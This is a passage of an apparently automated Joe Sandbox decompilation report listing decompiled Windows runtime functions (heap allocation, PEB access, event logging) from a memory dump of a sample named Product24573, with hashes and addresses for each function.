                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction ID: 0f8926edd407329d618cb4159962a3b2627b3076b865dab9cde5c3e741ac7670
                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction Fuzzy Hash: F5E02B323409416BEB159E49CC80F03775DDFD2728F004078B5001E246C7E5DC0987A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C8D34 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E011C8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x11ed360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01117D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0113B640(E01139AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                          0x011c8d34
                                          0x011c8d43
                                          0x011c8d4b
                                          0x011c8d4e
                                          0x011c8d52
                                          0x011c8d5c
                                          0x011c8d6e
                                          0x011c8d5e
                                          0x011c8d67
                                          0x011c8d67
                                          0x011c8d79
                                          0x011c8d7a
                                          0x011c8d7c
                                          0x011c8d81
                                          0x011c8d94

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da91274301994a0cd63381ff2470da335f47e98c172f18c9dbbda13af35c553e
                                          • Instruction ID: b04dc5fadf7d3f48d09f29826d86b8111653055962b7b9860208ea6d0e4f46d5
                                          • Opcode Fuzzy Hash: da91274301994a0cd63381ff2470da335f47e98c172f18c9dbbda13af35c553e
                                          • Instruction Fuzzy Hash: DBF0BE70E0460DAFDB18EFB8D441A6EB7B4EF68704F5080A9E915EB385EB34D900CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C8B58 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 36%
                                          			E011C8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x11ed360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01117D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0113B640(E01139AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                          0x011c8b67
                                          0x011c8b6f
                                          0x011c8b72
                                          0x011c8b7d
                                          0x011c8b8f
                                          0x011c8b7f
                                          0x011c8b88
                                          0x011c8b88
                                          0x011c8b9a
                                          0x011c8b9b
                                          0x011c8b9d
                                          0x011c8ba2
                                          0x011c8bb5

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0e18b0f68681cdc24386026f095e545f188c6c2649371294b04ff368256d714
                                          • Instruction ID: 235f74d343afce02561fb3bf909aaae9ff62ae67d15c33436d2d0e1abc5e3113
                                          • Opcode Fuzzy Hash: b0e18b0f68681cdc24386026f095e545f188c6c2649371294b04ff368256d714
                                          • Instruction Fuzzy Hash: 7BF0E2B0A0424DAFDF08EBA8D906E6EB3B4EF14704F000068BA05EB3C0EB34D900C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111746D Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0111746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0110EB70(__ecx, 0x11e79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E011395D0();
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                          0x0111746d
                                          0x0111746d
                                          0x0111746d
                                          0x01117471
                                          0x01117488
                                          0x0115f92d
                                          0x0111748e
                                          0x01117491
                                          0x01117495
                                          0x0115f937
                                          0x0115f93a
                                          0x0115f94e
                                          0x0115f953
                                          0x0115f956
                                          0x0115f956
                                          0x01117495
                                          0x00000000
                                          0x01117488
                                          0x01117473
                                          0x01117478
                                          0x0111747d
                                          0x01117481
                                          0x00000000
                                          0x01117481
                                          0x0111747d
                                          0x0111747a
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f60f0ab2daeaed1c6fc8f9968d6546c4bcaf03dcd5517d32aa104a219e29ed1
                                          • Instruction ID: d84b5a090193a02d3a049b10d7ea62c1f761b187b4ba54f19a84110d9c3c137e
                                          • Opcode Fuzzy Hash: 4f60f0ab2daeaed1c6fc8f9968d6546c4bcaf03dcd5517d32aa104a219e29ed1
                                          • Instruction Fuzzy Hash: 00F0E934980D45EADF0E97ACC440B79FFB1AF04314F050535D961A77D9F7649801C786
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C8CD6 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 36%
                                          			E011C8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x11ed360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01117D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0113B640(E01139AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                          0x011c8ce5
                                          0x011c8ced
                                          0x011c8cf0
                                          0x011c8cfb
                                          0x011c8d0d
                                          0x011c8cfd
                                          0x011c8d06
                                          0x011c8d06
                                          0x011c8d18
                                          0x011c8d19
                                          0x011c8d1b
                                          0x011c8d20
                                          0x011c8d33

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 999c2bd5a73fee341a6a1f572e8ba1853a814d8c813c66b77a7c8472973a44f3
                                          • Instruction ID: 653fe9fd667989b96fe25da61011af79493df8552c024f09f9856bdc7e1cb488
                                          • Opcode Fuzzy Hash: 999c2bd5a73fee341a6a1f572e8ba1853a814d8c813c66b77a7c8472973a44f3
                                          • Instruction Fuzzy Hash: C4F08270A0460DABDF08DBE8E945E6E77B4EF68704F5001A9E916EB3C1EB34D900C754
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010F4F2E Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010F4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E011C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0111C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x10d1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                          0x010f4f2e
                                          0x010f4f34
                                          0x010f4f38
                                          0x01150b85
                                          0x01150b85
                                          0x01150b89
                                          0x01150b9a
                                          0x01150b9a
                                          0x01150b9f
                                          0x00000000
                                          0x01150b9f
                                          0x01150b94
                                          0x01150b98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01150b98
                                          0x010f4f3e
                                          0x010f4f48
                                          0x00000000
                                          0x010f4f6e
                                          0x00000000
                                          0x010f4f70

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702ee71eee2ce155eea74ff8bd7ad05fe236df2782af31708bd15011687454b1
                                          • Instruction ID: e704f3048e7d5c6fdc588c2449f5c1d7399d9ec353773ddf10974ca93ce674be
                                          • Opcode Fuzzy Hash: 702ee71eee2ce155eea74ff8bd7ad05fe236df2782af31708bd15011687454b1
                                          • Instruction Fuzzy Hash: E8F0E23A921684CFD7BADB9CC1D4B26BBD4AF08778F044474EC2587922C734EE44C680
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112A44B Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0112A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x11e7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0113FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                          0x0112a44b
                                          0x0112a453
                                          0x0112a472
                                          0x0112a476
                                          0x00000000
                                          0x0112a493
                                          0x0112a47a
                                          0x0112a47f
                                          0x0112a486
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b58d12c7356cdff48961c9d8621da7268a8d6c4b9e204496b4ac2ddad16e551f
                                          • Instruction ID: 5cb41be5caaa7b1782cbf78ccb0124b7fb3a10a9a8f9b5cf9e07c52850c191ac
                                          • Opcode Fuzzy Hash: b58d12c7356cdff48961c9d8621da7268a8d6c4b9e204496b4ac2ddad16e551f
                                          • Instruction Fuzzy Hash: 2BE09272A01422ABD2255A58BC00F66B39DDFE4A55F0E4435E604C7654D728DD12C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FF358 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E010FF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0112F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01114620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                          0x010ff35d
                                          0x010ff361
                                          0x010ff367
                                          0x010ff372
                                          0x010ff38c
                                          0x010ff38c
                                          0x010ff394

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction ID: fde9ab14d1d828486514593151e1f911cd7703549e01cbb82e84747ad0bc646b
                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction Fuzzy Hash: B8E0D833A40119FBDB2196D99D06F5ABFBDDB54AA0F004195FA04D7550D6719D00C2D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0110FF60 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0110FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x10d11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E011C88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01110050(_t14);
				}
			}










                                          0x0110ff66
                                          0x0110ff6b
                                          0x00000000
                                          0x0110ff8f
                                          0x00000000
                                          0x0110ff8f

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f49f97b924f36b0f459c15af3921bf64fe72b5718b74fff46fbb2de94f56cbb4
                                          • Instruction ID: b0b5696032d52ba372a72cc7e245e201dd8c684be47327e9fb816b1b2d9f5329
                                          • Opcode Fuzzy Hash: f49f97b924f36b0f459c15af3921bf64fe72b5718b74fff46fbb2de94f56cbb4
                                          • Instruction Fuzzy Hash: 76E0DFB2A0D2069FD73FDB69D081F297B989F52625F1A801DF0084B582C7A2D883C287
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011841E8 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E011841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x11d08f0);
				_t5 = E0114D08C(__ebx, __edi, __esi);
				if( *0x11e87ec == 0) {
					E0110EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x11e87ec == 0) {
						 *0x11e87f0 = 0x11e87ec;
						 *0x11e87ec = 0x11e87ec;
						 *0x11e87e8 = 0x11e87e4;
						 *0x11e87e4 = 0x11e87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01184248();
				}
				return E0114D0D1(_t5);
			}





                                          0x011841e8
                                          0x011841ea
                                          0x011841ef
                                          0x011841fb
                                          0x01184206
                                          0x0118420b
                                          0x01184216
                                          0x0118421d
                                          0x01184222
                                          0x0118422c
                                          0x01184231
                                          0x01184231
                                          0x01184236
                                          0x0118423d
                                          0x0118423d
                                          0x01184247

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 816475ea3c7aad20459532088f2bd372ba1d9ef9b47796f2a7cc562ddd3dc4be
                                          • Instruction ID: 2a3a13348dac92247b49a39de1e66d9f6029c3df558ad6f10549479c78cdf2c2
                                          • Opcode Fuzzy Hash: 816475ea3c7aad20459532088f2bd372ba1d9ef9b47796f2a7cc562ddd3dc4be
                                          • Instruction Fuzzy Hash: A2F0FB78CA1B028FCBA9EBE9A60470836F4F764724F00812EA1209B6C8CB7454E5CF01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011AD380 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011AD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L010FE8B0(__ecx, _a4, 0xfff);
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                          0x011ad38a
                                          0x011ad39b
                                          0x011ad3b1
                                          0x00000000
                                          0x011ad3b6
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction ID: 0a7df9ded25baadece529261c3d793a048f22aa51ef3523da2a706c1fd2cd5e2
                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction Fuzzy Hash: 6FE0C235284A05BBDF266E84DC00FA9BB16DF507A0F114031FE089ABA0C7719C91D6C4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112A185 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0112A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x11e67e4 >= 0xa) {
					if(_t5 < 0x11e6800 || _t5 >= 0x11e6900) {
						return L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01110010(0x11e67e0, _t5);
				}
			}





                                          0x0112a190
                                          0x0112a1a6
                                          0x0112a1c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0112a192
                                          0x0112a192
                                          0x0112a19f
                                          0x0112a19f

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b53fd818ba57883e80be41b3f4d01aa8512570d7a0dd24fa7c3f077610829e3
                                          • Instruction ID: b9f7afaea55af3cd4da59d236322bdc77c4dd73a2bcef43a551cbb7d6139c8f9
                                          • Opcode Fuzzy Hash: 5b53fd818ba57883e80be41b3f4d01aa8512570d7a0dd24fa7c3f077610829e3
                                          • Instruction Fuzzy Hash: FED02B615608001AC72D5380AE3CB213293FBA4770F74881CF2030BD94FB60C8E0C108
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011216E0 Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011216E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01121710(0x11e67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01114620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                          0x011216e8
                                          0x011216ef
                                          0x011216f3
                                          0x011216fe
                                          0x00000000
                                          0x01121700
                                          0x0112170d
                                          0x0112170d
                                          0x011216f2
                                          0x011216f2
                                          0x011216f2
                                          0x011216f2

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e4e56b8ab99f3a97ebcfea3f095070876e6d5b21649d831a6803f4e85b964184
                                          • Instruction ID: 6c538a5c9a8c56774c092eb4f0380b5923d783b47f10db32ca72a9d02bf0de18
                                          • Opcode Fuzzy Hash: e4e56b8ab99f3a97ebcfea3f095070876e6d5b21649d831a6803f4e85b964184
                                          • Instruction Fuzzy Hash: 23D0A771140501B3EA3D9B149C04B193652EBD0B89F78006CF207598C0CFE4CCB2E048
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011753CA Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011753CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0110EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                          0x011753ca
                                          0x011753ce
                                          0x011753d9
                                          0x011753de
                                          0x011753e1
                                          0x011753e1
                                          0x011753e6
                                          0x011753f3
                                          0x00000000
                                          0x011753f8
                                          0x011753fb

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction ID: 818a083bf1f34f49f157b814b0043940ad4ddf0c1003a1ad75667b59c971cdde
                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction Fuzzy Hash: 7DE08C31944A809BDF1BEB59C650F4EBBF6FB44B00F180414A0085B7B0C774AC00CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0110AAB0 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0110AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                          0x0110aab6
                                          0x0110aabb
                                          0x0115a442
                                          0x00000000
                                          0x0115a448
                                          0x0115a454
                                          0x0115a454
                                          0x0110aac1
                                          0x0110aac1
                                          0x0110aac6
                                          0x0110aac6

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction ID: 9406d8a136ec462506dca0053c4e949d91c0dce68d709315d7729cf4837543e0
                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction Fuzzy Hash: 5CD0E935352A80CFD75BCB5DD554B1577A4BF44B44FC50590E901CB762E76CD984CA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011235A1 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011235A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0110EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                          0x011235a1
                                          0x011235a1
                                          0x011235a5
                                          0x011235ab
                                          0x011235ab
                                          0x011235b5
                                          0x00000000
                                          0x011235c1
                                          0x011235b7

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction ID: c41bf6e6a2a868c2ea42f91d95181df9b0c45294504bda10674e47909c7f452d
                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction Fuzzy Hash: 66D0A9318621919AEB0EAB14C2187683BB3BB08208F582065C05A0689AE33E4A2ACE01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FDB40 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010FDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01114620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                          0x010fdb4d
                                          0x010fdb54
                                          0x010fdb5f
                                          0x010fdb56
                                          0x010fdb56
                                          0x010fdb5c
                                          0x010fdb5c

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction ID: f07bde05a7e03a3bdf1c8ac62399bff983598b78bb6aa0f9aa7a95f6c21021cb
                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction Fuzzy Hash: 26C08C70280A01EAEB261F20CD02F007AA1BB10F09F4804A06300DA8F4DB78D801E600
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0117A537 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0117A537(intOrPtr _a4, intOrPtr _a8) {

				return L01118E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                          0x0117a553

                                          Memory Dump Source
